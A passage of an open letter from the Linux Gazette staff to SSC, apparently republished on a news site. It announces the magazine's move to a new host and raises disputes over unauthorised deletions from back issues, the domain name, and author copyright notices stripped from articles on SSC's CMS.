contents. Our new host site will be at http://www.linuxgazette.net/ ,
with the November issue coming out in a few days. We felt you should
know this immediately, in advance of any public announcement.
Following are a number of transition items we'd like to call to your
attention:
(1) Linux Gazette has been hosted at SSC so long that, inevitably, there
are some snarls we'll need to untangle: One is the existing LG
e-mail addresses, which we'd like to somehow transition over. We
would be glad to furnish an alias table for your sysadmins.
(2) Likewise, if you wish for any SSC sites to carry mirror copies of LG
issues, you'll have to establish a new mirroring run to pull them
down from our main site or its other mirrors. You are of course
welcome to use LG content in any way that complies with the Open
Publication License (issues #9 - present) or the BSD licence (issues
#1-8). There is actually an existing problem in that area, needing
SSC's immediate attention, about which more below.
(3) We would of course appreciate SSC assisting in letting the public
know of Linux Gazette's move. The other Linux press outlets will be
notified, a short time after this e-mail, and SSC's aid in getting
the word out will help assure a smooth changeover.
(4) In the course of populating our mirror network with back issues,
we've noticed that at least two of the issues carried on SSC's own
site (and from there picked up by most of its mirrors) now have
modifications to the magazine text that were not authorised by the
staff. I refer to issue #95 (Oct. 2003), for which SSC's copy is
missing a large fraction of the Mailbag article, and issue #92 (July
2003), which is missing Janine M. Lodato's article "Linux to Save
the Health of the World". These deletions were done without the
knowledge or approval of the staff, and impair the integrity of our
magazine's content. Accordingly, we must ask that you and all
downstream mirrors reverse those two -- and any other --
unauthorised changes to magazine text that SSC has enacted without
consulting the LG staff.
The issue #95 deletion I'm referring to is the same one we inquired
with you about in e-mail a couple of weeks ago, without receiving
any reply from you or from Jeff Tinzler. Clearer channels of
communication might have averted this situation.
(5) We wish you the best of luck with the recently deployed CMS-based
site. It is, however, absolutely not Linux Gazette, which (as
mentioned) we will keep publishing indefinitely on a non-CMS site.
Accordingly, we would appreciate your firm coining some other name
to use for the CMS site, and also assigning the linuxgazette.com
domain to us at your earliest convenience, to reduce confusion
between the sites.
The last item I need to mention is obviously sensitive, and so we are
deliberately bringing it to your attention privately, to avoid public
attention to it. (We assume that the problem referred to was created
entirely inadvertently.)
(6) As we've seen material being added to your CMS-based site in chunks
taken from prior LG issues, it seems that author attributions are
being (inadvertently) stripped from the articles, the author's
copyright notice removed, and SSC's copyright notice added in the
latter's place. Staffer Michael "Mick" Conry happened to notice
this happening with his News Bytes articles, now visible inside the
CMS at http://www.linuxgazette.com/node/view/92 . Mick's posted
copyright notice, viewable at
http://www.tldp.org/LDP/LG/current/lg_bytes.html, was wrongfully
removed from the CMS rendition. Such treatment of authors'
articles, in addition to being disrespectful of the authors' rights
to credit and ownership, constitutes violation of the covering Open
Publication License, and thus of copyright law.
We would love to be able to tell you that Mick's are the only articles
to which this happened -- or to give you a complete list of the
problematic postings -- but we don't (yet) have that information.
Accordingly, we strongly suggest that you do whatever is required to
find and correct all instances of credits / copyright notices
stripped from LG articles throughout your CMS.
We regret having to bring that matter to your attention, but are
obliged to take this matter seriously, as protectors of our authors'
interests. We would hope you can send us written assurance within
two days from this message's datestamp that no such instances exist
any more on your CMS. Please advise us by that same date if you
need additional time.
Because of the unfortunate pattern of non-communication with the
staff concerning SSC's unauthorised deletions from issue #95, and
the complete lack of consultation with the staff on SSC's deletions
from issue #92 and possibly others, we have to insist on a specific
written response on that matter. If we do not receive it, we will
have to pursue more public options, which we very much prefer to
avoid.
Thank you greatly for your patience and forbearance on these difficult
issues, which I expect and hope will be soon behind us. Pending our
straightening out our long-term communications channels, I would suggest
replying to both Mike Orr <mso-AT-oz.net>, and Heather Stern
<star-AT-starshine.org>, as they are leading the staff during this interim
period.
Yours Respectfully,
Rick Moen
on behalf of the Linux Gazette staff as a whole
Page editor: Jonathan Corbet
